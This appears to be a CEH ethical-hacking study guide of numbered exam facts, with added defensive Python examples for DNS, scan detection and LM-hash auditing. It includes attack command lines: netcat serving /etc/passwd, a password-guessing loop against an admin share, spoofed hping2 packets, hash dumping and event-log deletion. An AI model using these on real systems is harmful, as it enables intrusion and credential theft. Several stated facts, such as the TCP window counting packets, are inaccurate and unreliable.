CEH supplement v9.5

Parameter Security, 12/1/2009

C|EH Study Guide

Hacker University

Table of Contents

CEH v6 Study Guide (p. 4)
  Introduction to Ethical Hacking (p. 4)
  Footprinting (p. 5)
  Scanning (p. 7)
  Enumeration (p. 12)
  System Hacking (p. 12)
  Trojans and Backdoors (p. 16)
  Sniffers (p. 16)
  Denial of Service (p. 17)
  Session Hijacking (p. 18)
  Buffer Overflows (p. 19)
  Hacking Web Servers (p. 20)
  Web Application Vulnerabilities (p. 21)
  Web Based Password Cracking (p. 22)
  Linux Hacking (p. 22)
  Cryptography (p. 23)
  SQL Injection (p. 24)
  Hacking Wireless Networks (p. 25)
  Viruses (p. 25)
  Evading IDS, Firewalls, and Honeypots (p. 26)
  Social Engineering (p. 28)
  Physical Security (p. 28)
Attack Analysis (p. 29)
  Attack #1 (p. 29)
  Attack #2 (p. 29)
  Attack #3 (p. 30)
  Attack #4 (p. 31)
  Attack #5 (p. 31)
  Attack #6 (p. 31)
  Attack #7 (p. 32)
  Attack #8 (p. 33)
  Attack #9 (p. 34)
  Attack #10 (p. 36)
  Attack #11 (p. 37)
  Attack #12 (p. 38)
  Attack #13 (p. 38)
  Attack #14 (p. 39)
  Attack #15 (p. 39)
Labs (p. 40)
  Footprinting (p. 40)
  Scanning (p. 41)
  Enumeration (p. 42)
  System Hacking (p. 42)
  Trojans and Backdoors (p. 43)
  Sniffers (p. 44)
  Denial Of Service (p. 45)
  Session Hijacking (p. 46)
  Buffer Overflow (p. 52)
  Hacking Web Servers (p. 55)
  Web Application Vulnerabilities (p. 55)
  Linux Hacking (p. 56)
  SQL Injection (p. 57)
  Wireless Hacking (p. 60)
  Viruses (p. 60)


CEH v6 Study Guide

Introduction to Ethical Hacking

1. The five steps of malicious hacking are:

Reconnaissance

Scanning

Gaining Access

Maintaining Access

Covering Tracks

2. Active attacks are typically more intrusive and therefore more easily detected.

3. Passive attacks include information gathering through web search engines, DNS queries etc. Note: scanning the range of IP addresses found in a company’s DNS database is NOT passive footprinting.

4. A black hat hacker is malicious and is sometimes called a cracker.

5. A white hat hacker is an ethical hacker. An ethical hacker does it for defensive purposes and has permission. A white hat hacker is an ethical hacker who runs tests, writes reports, and signs all legal non-disclosure documents prior to working on a test.

6. Hacktivism is hacking for social, political, and religious causes.

7. Black box testing is when you have no knowledge of a target. You are only given a company name.

8. White box testing is when you have full knowledge.

9. Gray box testing, also called internal testing, is when you perform attacks with a normal user account to see if you can escalate privileges.

10. Insiders are common sources of attacks. Examples of insiders include disgruntled employees, customers, suppliers, vendors, business partners, contractors, temps, and consultants.

11. A company is legally liable for the content of e-mail that is sent from its systems, regardless of whether the message was sent for private or business-related purposes. You cannot claim ignorance of the law to avoid prosecution.

12. Every company should have an Information Security Policy (ISP) that informs employees about what they are allowed to use the company's systems for, what is prohibited, and what should happen if they break the rules.

13. The United States CAN-SPAM Act criminalizes the transmission of unsolicited commercial e-mail (spam) without an existing business relationship.

14. The Computer Misuse Act 1990 is a United Kingdom (UK) law that makes hacking into an unauthorized network a felony.

15. The first step an attacker will take is to perform a reconnaissance of the remote target.

16. Educate everyone with books, articles, and training on risk analysis, vulnerabilities, and safeguards to bridge the gap between black hats and white hats.

17. Suicide hackers are those hackers that do not care about being caught.

18. The FBI investigates computer crimes involving e-mail scams and mail fraud using 18 U.S.C. 1030, Fraud and Related Activity in Connection with Computers.

19. An exploit takes advantage of vulnerabilities in a system in the pursuit of some objective.

Footprinting

20. Footprinting is the blueprinting of the security profile of an organization.

21. Examples of footprinting tools include:

SamSpade

NSLookup

Traceroute

NeoTrace

22. NSLookup is a program to query Internet domain name servers. It is used to display DNS information.

23. Type the following to do a zone transfer with NSLookup:

nslookup (takes you into interactive mode)

ls -d targetsite.com

24. Zone transfers allow you to list all DNS information for a domain.

25. Below is an example of a log entry that shows a possible zone transfer:

Mar 12 01:44:12 [3142]: IDS181/nops-x86: 12.55.180.48 -> 10.8.0.7:53

26. There are several types of DNS records:

A – host record

CNAME – alias

MX – mail exchange (mail server)

NS – name server

SOA – start of authority

27. A DNS zone is a collection of domains. You can use tools such as NSLookup, Dig, Sam Spade, or Host to perform a zone transfer.

28. The highest priority MX record has the lowest number.

29. A DNS SOA record will contain the following:

Serial number – revision number (sometimes called the 'version' number)

Refresh – refresh interval for secondary DNS servers

Retry – retry interval if a zone transfer fails

Expire – how long the secondary server will hold onto the record if it does not receive an update (e.g., 604800 = one week)

TTL – default TTL for client name resolution

30. A secondary name server will request a zone transfer from a primary name server when the primary's SOA serial is higher than the secondary's SOA serial.
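A worked example of items 29 and 30, added here and not part of the study guide: it parses an SOA record in the text form that dig prints, labels the fields the guide lists, and implements the secondary's decision to request a zone transfer. It goes one step beyond the guide: DNS serials are 32-bit and wrap around, so the comparison follows RFC 1982 serial-number arithmetic rather than a plain greater-than, which would misjudge a zone whose serial has rolled over. The zone example.test and its field values are constructed.

```python
"""Parse a DNS SOA record and decide whether a secondary should pull a zone transfer.

Added example (not from the study guide). The field names follow the guide's SOA
list (serial, refresh, retry, expire, TTL/minimum); the sample record is constructed.
"""
from dataclasses import dataclass

# Constructed sample in the presentation format `dig SOA` prints for a fictitious zone:
# owner TTL class SOA mname rname serial refresh retry expire minimum
SAMPLE_SOA = ("example.test. 3600 IN SOA ns1.example.test. hostmaster.example.test. "
              "2009120101 10800 3600 604800 86400")

SERIAL_BITS = 32
SERIAL_MOD = 2 ** SERIAL_BITS


@dataclass(frozen=True)
class SOA:
    mname: str      # primary master name server
    rname: str      # responsible mailbox (first dot stands for '@')
    serial: int     # zone revision ("version") number
    refresh: int    # seconds before a secondary re-checks the primary's serial
    retry: int      # seconds to wait after a failed refresh/zone transfer
    expire: int     # seconds a secondary keeps serving the zone without contact
    minimum: int    # default/negative-caching TTL ("TTL" in the guide's list)


def parse_soa(record: str) -> SOA:
    """Parse one presentation-format SOA record; reject anything else."""
    fields = record.split()
    if len(fields) != 11 or fields[3].upper() != "SOA":
        raise ValueError(f"not an SOA record: {record!r}")
    mname, rname = fields[4], fields[5]
    serial, refresh, retry, expire, minimum = (int(x) for x in fields[6:11])
    return SOA(mname, rname, serial, refresh, retry, expire, minimum)


def serial_gt(a: int, b: int) -> bool:
    """True if serial a is newer than serial b under RFC 1982 serial arithmetic.

    Serials wrap at 2**32, so "newer" means a lies less than half the space
    ahead of b, modulo 2**32; equal serials are never newer.
    """
    if a == b:
        return False
    diff = (a - b) % SERIAL_MOD
    return 0 < diff < SERIAL_MOD // 2


def secondary_should_transfer(primary: SOA, secondary: SOA) -> bool:
    """Item 30: a secondary requests a zone transfer when the primary's serial is higher."""
    return serial_gt(primary.serial, secondary.serial)


def seconds_until_stale(soa: SOA, seconds_since_last_contact: int) -> int:
    """How much longer a secondary that lost contact may keep serving before the zone expires."""
    return max(0, soa.expire - seconds_since_last_contact)


if __name__ == "__main__":
    current = parse_soa(SAMPLE_SOA)
    bumped = SOA(current.mname, current.rname, current.serial + 1,
                 current.refresh, current.retry, current.expire, current.minimum)
    print(current)
    print("expire in days:", current.expire / 86400)
    print("secondary should transfer after a serial bump:",
          secondary_should_transfer(bumped, current))
```

Operationally, a secondary whose own SOA still carries the old serial after more than `refresh` seconds, or that keeps retrying every `retry` seconds, is the first thing to check when zone data looks stale.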

31. Traceroute works by manipulating the TTL field to elicit a "time exceeded in transit" message. It is commonly used to find the route to a target system. While it commonly uses UDP and ICMP, traceroute can use any protocol. Therefore, blocking ICMP and UDP is not enough to stop hackers from tracerouting into your network. There is no way to completely block tracerouting.

32. Dumpster diving is when you search through garbage, recycled paper, and other rubbish to collect information about a company.

33. The Netcraft web site is a passive tool that you can use to see the operating system a web server is using.

34. Archive.org allows you to retrieve an archive of a company's web site.

35. There are five Regional Internet Registries (RIRs):

ARIN (North America) – used for .com addresses

APNIC (Asia Pacific)

LACNIC (South and Central America) – used for places like Panama

RIPE (Europe, Northern Africa)

AfNIC (Sub-Saharan Africa) – note: the test may not be updated to include AfNIC

36. Examples of passive footprinting include searching web sites, performing queries on search engines, and going through rubbish to find information.

37. Using Whois and Netcraft is considered passive scanning.

38. Hackers can use job postings to determine the operating systems and applications being used at a company.

39. Passive information gathering includes discovering which web domains a company is using.

40. You can use Google to determine if a company's web site is linked to by other sites. This is useful in footprinting. For example, to find all sites that have links to www.eccouncil.org, type link:www.eccouncil.org into Google.

41. You can search Google for different types of systems on the Internet. For example, to search for all BorderManager proxy/firewalls, type intitle:"BorderManager information alert".

42. Technical information is often revealed in newsgroup postings. You can use NNTP web sites to search for newsgroup postings by a target company.

43. You should not have an AD-integrated DNS server for Internet domains.


Scanning

44. To discover what telephone numbers you can use to dial into a router, use a war-dialing tool with a range of phone numbers and look for a CONNECT response.

45. Once footprinting is completed, the next step is scanning.

46. Common war dialing tools include:

THC-Scan

ToneLoc

TBA

47. Firewalking is a technique used to discover what rules are configured on a gateway. It sends packets to various ports (usually 1-1024) with the exact TTL of the target. You can use Hping2 to do firewalking.

48. An IDLE scan monitors the IP ID value of an idle host. If this value increments by more than one, then the port is open on the target system.

49. Windows machines do not respond to broadcast pings or pings directed at a network address.

50. A clue that someone is doing an SNMP walk on your system is seeing a series of items separated by periods in your log files. Example: system.SysName, system.sysObjectID

51. SNMP is a connectionless protocol that uses UDP port 161. The default passwords used by SNMP are private and public.

52. Cisco routers can protect against SNMP attacks by using access lists. For example, the following commands will only allow hosts on the 192.168.99.0/24 network to read and write information via SNMP (each community string is bound to access list 1). This configuration does not prevent someone from running a network sniffer and capturing returned traffic with the configuration file. It also does not prevent someone from sending a customized SNMP set request with a spoofed source IP address.

access-list 1 permit 192.168.99.0 0.0.0.255
!
snmp-server community public RO 1
snmp-server community private RW 1

53. An SNMP scanner will send SNMP requests to multiple IP addresses, trying different community strings, and waiting for a reply. If you get no reply, it could be that the SNMP server is not running, you have tried an invalid community string, or the machine is unreachable.

54. SNMP uses community strings that are transmitted in clear text and are therefore susceptible to sniffing.

55. TCP/IP Concepts

The three-way handshake is SYN, SYN-ACK, ACK.


You cannot spoof your IP address and successfully use TCP.

The FIN flag is used to close a TCP connection when a host has no more data to transmit. However, a host can continue to receive data as long as the SYN sequence number of transmitted packets is lower than the packet segment containing the set FIN flag.

The receiving host sets the window size, which specifies the number of packets it will receive before sending an acknowledgement.

0xFFFFFFFFFFFF is the destination MAC address of a broadcast frame.

In TCP communication, a host will set its acknowledgement number to the sequence number it just received plus one. For example, if a host just received sequence number 100, it will respond with acknowledgement number 101.

There are 1024 well known ports (for this exam).

56. OS fingerprinting is the process of determining the operating system of your target. Fingerprinting an operating system does not depend on patches that have been applied. With NMAP you can do OS fingerprinting with the -O command line switch. Queso is another tool that can be used for OS fingerprinting.

57. The default behavior of an NMAP scan is to do both an ICMP ping sweep (ICMP ECHO_REQUEST) and a TCP ACK ping sweep.

58. ICMP types/codes:

Type 0 code 0 = Echo Reply (used with the ping command)

Type 3 code 13 = Destination unreachable: administratively prohibited (this message is given by routers when a router is blocking ICMP)

Type 8 code 0 = Echo (used with the ping command)

Type 11 code 0 = Time exceeded

Type 13 code 0 = Timestamp request

Type 14 code 0 = Timestamp reply

Type 17 code 0 = Address mask request

Type 18 code 0 = Address mask reply

59. There are several methods of scanning with NMAP:

Scan Type                  NMAP Command  Bits set      Response when port is open                      Response when port is closed
TCP Connect()              nmap -sT      SYN           SYN/ACK                                         RST
SYN (a.k.a. stealth scan)  nmap -sS      SYN           SYN/ACK (SYN scans do not respond to SYN/ACKs)  RST
FIN                        nmap -sF      FIN           --                                              RST
XMAS                       nmap -sX      FIN/URG/PSH   --                                              RST
Null                       nmap -sN      None          --                                              RST

60. A fragmentation scan sends the probe packet and splits the TCP header over several packets to make it harder for packet filters to detect what is happening.

61. A TCP Connect scan is the most accurate and reliable.

62. The three inverse scans are FIN (FIN bit), XMAS (FIN/URG/PSH) and NULL (no bits). The inverse scans will report nothing for an open port and a RST for a closed port. Windows does not comply with the RFC and therefore will report all ports as closed when performing these scans.

63. SAINT is a vulnerability scanner that only works on Linux and UNIX.

64. Connect scans should be used when you need reliable and quick results but do not care about being stealthy.

65. A distributed port scan operates by having multiple computers each scan a small number of ports, then correlating the results.

66. Many of the Nmap commands in Linux must be run under the context of the root administrator. For example, to run a ping scan against the 192.168.1.0/24 network (which includes the 192.168.1.15 host), type 'sudo nmap -sP 192.168.1.0/24'.

67. A ping scan will produce results similar to the following:

Host 192.168.1.1 appears to be up.
MAC Address: 00:13:55:3F:1C:44 (Cisco-Linksys)
Host 192.168.1.2 appears to be up.
MAC Address: 00:55:23:8D:00:1E (Compaq Computer)

68. Nmap will try to guess the operating system when it does a scan against a computer. Sometimes it is unable to detect the operating system. However, by looking at the open ports you can often determine what type of machine it is. For example, while there is no way of telling for sure, the following output is most likely a Windows Domain Controller because LDAP is open.

21/tcp open ftp
25/tcp open smtp
80/tcp open http
389/tcp open ldap
443/tcp open https


69. Stealth scans do not open a full TCP connection.

70. If you see someone trying to scan port 500 (ISAKMP), they might be trying to determine the type of VPN implementation you are using and checking for IPSec.

71. Nmap can be used to scan multiple networks. For example, the command nmap 215.55.12-13.* will scan 512 hosts.

72. If you are not getting a ping response using ICMP, it might be because ICMP is being blocked. Try HPING2 instead because it uses stealth TCP packets to connect instead of ICMP.

73. LDAP (TCP 389) and MS-SQL-S (TCP 1433) are ports that are often open on Windows 2000 servers.

74. Ping sweeps may not return results if:

The host is down

ICMP is being filtered

The packet TTL value is too low

The destination network is down

75. You can scan for protocols in use on a target by using the nmap -sO command. This will show up in a tcpdump capture with the words ip-proto-<protocol number>.

76. If pings and basic port scans fail, try using an inverse scan like XMAS.

77. LDAP uses port 389.

78. The -O switch in Nmap is used for OS detection.

79. If you see suspicious traffic on port 53, check to see if an attacker is trying to do a DNS zone transfer.

80. Netstat has a number of switches. The netstat -anb -p tcp command will return all listening ports as well as the files that use those ports.

C:\>netstat -anb -p tcp

Active Connections

Proto  Local Address  Foreign Address  State      PID
TCP    0.0.0.0:135    0.0.0.0:0        Listening  125
C:\windows\system32\ws2_32.dll
C:\windows\system32\RPCRT4.dll
C:\windows\system32\rpcss.dll
C:\windows\system32\svchost.exe
C:\windows\system32\ADVAPI32.dll
[svchost.exe]

81. Hping2 has many options. The following command will generate a single TCP SYN packet with a source port of 2000, destination port 30, and sequence number 15, spoofing the IP address 172.16.0.5:

Linux# hping2 -I ether0 -a 172.16.0.5 -s 2000 -p 30 --syn -c 1 -d 0xF00 --setseq 0x0000000f 10.0.0.1

82. Hping2 is a pinging tool and a packet assembler. Here's another example of Hping2:

# hping2 10.0.0.1 --seqnum -p 139 -S -i u1 -I eth0

HPING uaz (eth0 10.0.0.1) S set, 40 headers + 0 data bytes
2361294848 +2361294848
2411626596 +50331648

The first number is the sequence number and the second is the offset.

83. Floppyscan is a utility loaded on a floppy disk that will cause a Blue Screen of Death to appear on your monitor while it performs a port scan in the background.

84. The best defense against Hping2 attacks is to use stateful packet inspection on your firewalls.

85. You can specify ports to scan with nmap using the -p switch. For example, to scan the lower 1024 UDP ports, execute the following command: nmap -sU -p 1-1024 <ip address>.

86. You can use Netcat to scan ports: nc -z -u <ip address> 1-1024.

87. You can scan for IP protocols using the command nmap -sO. Look for the text "ip-proto" in tcpdump output to tell if someone is doing an IP protocol scan.

88. ACK scans are used to scan and enumerate the rule sets on firewalls. If a port is being filtered by a rule set you will get nothing back. If the port is not being filtered then you should get a RST.

Responses to an ACK scan:

UNFILTERED: RST

FILTERED: (nothing)

89. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities.

90. You cannot block a hacker from doing a FIN, NULL, or XMAS scan on your network.

91. The attack signature for SYN floods is a large number of SYN packets appearing on a network without the corresponding reply packets.

92. SandTrap can be used to notify you if anyone tries to break into your PBX.

93. You cannot stop a hacker from launching FIN, NULL, or X-MAS scans on your network.

94. If you are concerned that someone could block your scans and you want to slow your scans down, try using the -T0 or -T1 switch to change the timing.


95. In a UDP port scan, an open port will not respond and a closed port (e.g., a port not being used) will send an ICMP message stating that the port is unreachable.
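The response rules in items 59, 62, 88 and 95 can be turned around for detection: in a capture, a probe's flags tell you the scan type and the answer, or the lack of one, tells you what the scanner learned about each port. The following is an added example, not from the study guide, that does this over constructed tcpdump-style lines; the regular expressions assume tcpdump's default text format, and the scanner (10.8.0.99) and target (10.8.0.7) addresses are made up. Bare ACK probes are deliberately left unclassified, because a lone ACK is ordinary traffic, whereas FIN, XMAS and NULL probes never occur in a legitimate session and are always worth reporting. It also counts SYNs that received no reply at all, the SYN flood signature of item 91.

```python
"""Infer scan type and port state from tcpdump-style lines using the guide's response rules.

Added example, not code from the study guide. The capture below is constructed; the
flag letters (S, F, P, U, R, '.' for ACK, 'none') are tcpdump's real notation.
"""
from __future__ import annotations

import re
from collections import Counter

# Constructed capture: one scanner (10.8.0.99) probing one host (10.8.0.7).
CAPTURE = """\
01:44:10.000001 IP 10.8.0.99.40001 > 10.8.0.7.80: Flags [S], seq 1000, win 1024, length 0
01:44:10.000050 IP 10.8.0.7.80 > 10.8.0.99.40001: Flags [S.], seq 5000, ack 1001, win 65535, length 0
01:44:10.000100 IP 10.8.0.99.40001 > 10.8.0.7.80: Flags [R], seq 1001, win 0, length 0
01:44:10.100000 IP 10.8.0.99.40002 > 10.8.0.7.81: Flags [S], seq 1000, win 1024, length 0
01:44:10.100050 IP 10.8.0.7.81 > 10.8.0.99.40002: Flags [R.], seq 0, ack 1001, win 0, length 0
01:44:11.000000 IP 10.8.0.99.40003 > 10.8.0.7.22: Flags [FPU], seq 2000, win 1024, urp 0, length 0
01:44:11.000040 IP 10.8.0.7.22 > 10.8.0.99.40003: Flags [R.], seq 0, ack 2000, win 0, length 0
01:44:11.100000 IP 10.8.0.99.40010 > 10.8.0.7.445: Flags [F], seq 2500, win 1024, length 0
01:44:11.100030 IP 10.8.0.7.445 > 10.8.0.99.40010: Flags [R.], seq 0, ack 2500, win 0, length 0
01:44:11.200000 IP 10.8.0.99.40004 > 10.8.0.7.139: Flags [none], seq 3000, win 1024, length 0
01:44:12.000000 IP 10.8.0.99.40005 > 10.8.0.7.53: UDP, length 0
01:44:12.000100 IP 10.8.0.99.40006 > 10.8.0.7.161: UDP, length 0
01:44:12.000200 IP 10.8.0.99.40007 > 10.8.0.7.1000: UDP, length 0
01:44:12.000250 IP 10.8.0.7 > 10.8.0.99: ICMP 10.8.0.7 udp port 1000 unreachable, length 36
01:44:13.000000 IP 10.8.0.99.40008 > 10.8.0.7.25: Flags [S], seq 4000, win 1024, length 0
01:44:13.000001 IP 10.8.0.99.40009 > 10.8.0.7.25: Flags [S], seq 4001, win 1024, length 0
"""

# Probe flag sets -> scan names from the guide's table (items 59 and 62). Keys are the
# flag letters sorted; "none" is what tcpdump prints for a NULL probe. A bare ACK is
# omitted on purpose: ACK probes look like ordinary traffic and need context to spot.
PROBE_TYPES = {"S": "SYN/Connect", "F": "FIN", "FPU": "XMAS", "none": "NULL"}

TCP_RE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]*)\]")
UDP_RE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): UDP")
ICMP_RE = re.compile(r"IP (\S+) > (\S+): ICMP \S+ udp port (\d+) unreachable")


def probe_type(flags: str) -> str | None:
    """Scan type for a probe carrying these flags, or None if it is not a probe we classify."""
    return PROBE_TYPES.get(flags if flags == "none" else "".join(sorted(flags)))


def port_state(kind: str, response: str | None) -> str:
    """Apply the guide's rules: what a probe's answer (or silence) says about the port."""
    if kind == "SYN/Connect":
        return {"SYN/ACK": "open", "RST": "closed"}.get(response, "filtered")
    if kind == "UDP":  # item 95: ICMP port unreachable means closed, silence is ambiguous
        return "closed" if response == "ICMP unreachable" else "open|filtered"
    # Inverse scans (FIN, XMAS, NULL), item 62: RST means closed, silence means open or filtered.
    return "closed" if response == "RST" else "open|filtered"


def analyze(capture: str) -> dict:
    """Pair probes with their answers; summarize scan types, port states and unanswered SYNs."""
    tcp: dict[tuple, dict] = {}   # (scanner, target, sport, dport) -> {"kind", "response"}
    udp: dict[tuple, str | None] = {}  # (scanner, target, dport) -> response or None
    for line in capture.splitlines():
        if m := TCP_RE.search(line):
            src, sport, dst, dport, flags = m.groups()
            if kind := probe_type(flags):
                tcp[(src, dst, sport, dport)] = {"kind": kind, "response": None}
                continue
            back = (dst, src, dport, sport)  # an answer flows target -> scanner
            if back in tcp and tcp[back]["response"] is None:
                if "R" in flags:
                    tcp[back]["response"] = "RST"
                elif "S" in flags and "." in flags:
                    tcp[back]["response"] = "SYN/ACK"
        elif m := UDP_RE.search(line):
            src, _sport, dst, dport = m.groups()
            udp.setdefault((src, dst, dport), None)
        elif m := ICMP_RE.search(line):
            src, dst, port = m.groups()
            if (dst, src, port) in udp:
                udp[(dst, src, port)] = "ICMP unreachable"

    scan_types: Counter = Counter()
    ports: dict[tuple, str] = {}
    for (scanner, target, _sport, dport), probe in tcp.items():
        scan_types[(scanner, probe["kind"])] += 1
        ports[(target, "tcp", int(dport))] = port_state(probe["kind"], probe["response"])
    for (scanner, target, dport), response in udp.items():
        scan_types[(scanner, "UDP")] += 1
        ports[(target, "udp", int(dport))] = port_state("UDP", response)
    unanswered = sum(1 for p in tcp.values() if p["kind"] == "SYN/Connect" and p["response"] is None)
    return {"scan_types": dict(scan_types), "ports": ports, "unanswered_syns": unanswered}


if __name__ == "__main__":
    for key, value in analyze(CAPTURE).items():
        print(key, value)
```

Any non-zero count for FIN, XMAS or NULL from a single source is reportable on its own; for SYN/Connect, a rising `unanswered_syns` against one target is what distinguishes a flood or a sweep of filtered ports from normal connection setup.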

96. A program that defends against a port scanner will attempt to update a firewall rule in real time to prevent the port scan from being completed.

97. Fragmentation scanning splits the TCP header over several packets to make it harder for packet filters to detect what is happening.

98. Port scanning is an information gathering attack.

99. Nessus is an automated vulnerability assessment tool that has a database containing signatures that is able to detect hundreds of vulnerabilities. One disadvantage of an automated vulnerability assessment tool is that it is noisy.

100. After doing a port scan you should connect to open ports to discover applications.

101. Static network address translation maps a single machine on an internal network to a single public IP address.

102. Look in %windir%\system32\drivers\etc\services to find the port number for POP3 on your server. (Note: POP3 is used to receive e-mail.)

Enumeration

103. If NMAP was unable to identify the operating system of a web server, telnet to an open port and grab the banner.

104. Enumeration tools include USER2SID, SID2USER, and DumpSec.

105. The SID ending in 500 is the built-in Administrator account.

106. If the Administrator account has been renamed but you still know the SID, you can use sid2user to find the new name of the Administrator account.

107. The default passwords (community strings) in SNMP are private (read-write) and public (read-only). These community strings are sent in clear text and are therefore susceptible to sniffing.

108. You should use SMB signing to protect against hackers modifying SMB packets and forwarding them.

109. If you must run an SMTP server, you cannot prevent people from using telnet to connect to port 25 on your e-mail server.

110. Hackers will often send a single SMTP message to an address that does not exist to gather information about internal hosts used in e-mail handling.

111. To grab the banner of a web server, telnet to port 80 and type HEAD / HTTP/1.0.

112. An attacker may scan port 137 to check for file and print sharing on Windows systems.

System Hacking

113. If L0phtcrack is unable to capture any logons when attempting to sniff SMB exchanges, it could be that the network is using Kerberos.

114. Alternate Data Streams (ADS) are found in all versions of NTFS and are described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer.

115. A hardware keylogger cannot be detected by anti-virus or anti-spyware products.

116. Hardware keyloggers, software keyloggers, and sniffers can all be used to capture passwords.

117. Snow is an example of a steganography utility that exploits the nature of white space and allows the user to conceal information in these white spaces.

118. Stealth Anonymizer can be used to bypass Internet monitoring systems.

119. The three password cracking techniques are dictionary, hybrid, and brute force. A dictionary attack compares the hashes with those in a dictionary file. A hybrid attack is a combination of both brute force and dictionary. A brute force attack is trying every combination of letters, numbers, upper case, lower case, and special characters. A dictionary attack is the fastest while a brute force attack takes the longest. Brute force is also your best option if random password generators are being used to create passwords for users.

120. You can always tell if a password has less than 8 characters because the hash will end with AAD3B435B51404EE.

121. You can use netcat to grab a password file. The syntax would be nc -l -u -p 1111 < /etc/passwd.

122. Hackers will often try to cover their tracks. If a hacker wanted to clear any records of brute force attempts, they would want to delete c:\windows\system32\config\SecEvent.Evt.

123. CACLS.exe is a command line tool that can be used to assign, display, or modify ACLs on files or folders.

124. You can use Pwdump to dump the SAM password hashes to a file. The syntax is pwdump > file.txt.

125. The last step an attacker will do in an attack to prevent being caught is to cover their tracks.

126. Windows 2000 Server Syskey uses 128-bit encryption. This is considered an effective countermeasure to the weaknesses in Windows LM hashes (along with enforcing Windows complex passwords).

127. Best practices for password creation:

Never use a password found in a dictionary

Never use a password related to your hobbies, pets, relatives, or date of birth

Never leave a default password

Never use a password related to the hostname, domain name, or anything else that can be found with whois


128. Windows LAN Manager (LM) hashes are converted to uppercase and split to give an effective length of 7 characters.

129. You should do the following when you introduce a new Windows computer onto your network:

Patch the system by installing the latest service packs and hotfixes

Configure Windows Update to be automatic

Install a personal firewall and lock down unused ports from connecting to your computer

Create a non-admin user with a complex password and log on to this account

Install the latest anti-virus signatures

Key applications should have the latest security patches installed

130. Alternate data streams are used to hide files inside of other files. Clue to spot ADS: file1.exe:file2.exe (two files separated by a colon)

131. You can crack passwords via the command line with the following command:

for /f "tokens=1" %%a in (file.txt) do net use * \\10.0.0.1\c$ /user:"Administrator" %%a

132. Password cracking tools do not reverse the hash of a password to recover passwords. Instead, they hash words and compare them with the password's hash.

133. The best countermeasure against privilege escalation is to give each user the least amount of privileges.

134. MBSA is a patch management utility that scans one or more computers on your network and alerts you if any important Microsoft security patches are missing.

135. 14-character passwords do not take much longer to crack than 8-character passwords because LanManager hashes are broken up into two seven-character fields.
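An added example, not from the study guide, that reads a pwdump-format dump (item 124) and applies the facts in items 105, 120, 128 and 135 as an audit rather than a cracking step: it flags a renamed built-in Administrator by its RID, accounts that still store an LM hash (and are therefore no stronger than two 7-character uppercase halves), passwords shorter than 8 characters by the AAD3B435B51404EE second half, and empty passwords by the NT hash of the empty string. The dump lines are constructed; apart from the two well-known empty-password constants, the hash values are made-up hex.

```python
"""Audit a pwdump-style dump for the LM-hash weaknesses the guide lists.

Added example, not code from the study guide. Dump lines are constructed; only
EMPTY_LM_HALF (from item 120) and EMPTY_NT are real constants, the rest is made-up hex.
"""
import re
from dataclasses import dataclass, field

EMPTY_LM_HALF = "AAD3B435B51404EE"              # LM hash of a 7-byte block of NULs (item 120)
EMPTY_LM = EMPTY_LM_HALF * 2                    # LM hash when no LM hash is stored / empty password
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash of the empty password
BUILTIN_ADMIN_RID = 500                         # item 105

# Constructed sample in pwdump format: user:RID:LM hash:NT hash:::
SAMPLE_DUMP = """\
SysOwner:500:1111222233334444AAAABBBBCCCCDDDD:0123456789ABCDEF0123456789ABCDEF:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
jdoe:1001:1234567890ABCDEFAAD3B435B51404EE:89ABCDEF0123456789ABCDEF01234567:::
svc_backup:1002:AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
broken line without fields
"""

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32}):::$"
)


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str
    findings: list = field(default_factory=list)


def parse_dump(text: str) -> tuple[list, list]:
    """Parse pwdump lines; return (accounts, lines that did not match the format)."""
    accounts, rejected = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            rejected.append(line)
            continue
        accounts.append(Account(m["user"], int(m["rid"]), m["lm"].upper(), m["nt"].upper()))
    return accounts, rejected


def audit(account: Account) -> list:
    """Attach findings from the guide's LM/SID facts to one account and return them."""
    first_half, second_half = account.lm[:16], account.lm[16:]
    if account.rid == BUILTIN_ADMIN_RID and account.user.lower() != "administrator":
        account.findings.append("RID 500: built-in Administrator account, renamed")
    if account.nt == EMPTY_NT:
        account.findings.append("empty password")
    if account.lm != EMPTY_LM:
        # Items 128/135: an LM hash is two independent 7-character uppercase halves.
        account.findings.append("LM hash stored: crackable as two 7-character uppercase halves")
        if second_half == EMPTY_LM_HALF and first_half != EMPTY_LM_HALF:
            # Item 120: the second block was all padding, so the password is under 8 characters.
            account.findings.append("password shorter than 8 characters (second LM half is the empty-block constant)")
    return account.findings


def audit_dump(text: str) -> tuple[dict, list]:
    """Audit every account in a dump; return ({user: findings}, rejected lines)."""
    accounts, rejected = parse_dump(text)
    return {a.user: audit(a) for a in accounts}, rejected


if __name__ == "__main__":
    report, bad = audit_dump(SAMPLE_DUMP)
    for user, findings in report.items():
        print(f"{user}: {findings or 'no findings'}")
    print("unparsed lines:", bad)
```

The remediation for the LM findings is the one the guide gives in item 126: stop storing LM hashes and enforce complex passwords, after which every account's LM field reads AAD3B435B51404EEAAD3B435B51404EE and only the NT hash matters.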

136. Attacking well-known system defaults is one of the most common hacker attacks. Often the default location of installation files can be exploited, which allows a hacker to retrieve a file from the system; many software packages come with "samples" that can be exploited; and many systems come with default user accounts with well-known passwords that administrators forget to change.

137. Image steganography hides information within picture files.

138. If you have remote users connecting in to a Windows Server 2003 Active Directory domain by using Challenge Handshake Authentication Protocol (CHAP), then you must enable the "Store password using reversible encryption for all users in the domain" setting in the Default Domain Group Policy, because CHAP needs the clear-text password on the server side. This stores every domain password in a recoverable form, which is why CHAP should be avoided in favour of MS-CHAPv2 or EAP-TLS where the clients support them.

139. One indication that you may be infected with a stealth kernel level rootkit is that

you start to realize that your computer is not running as fast as it used to and your

computer reports you have limited space on your hard drive

140. Steganography fits in the Hide Files step of the system hacking cycle.


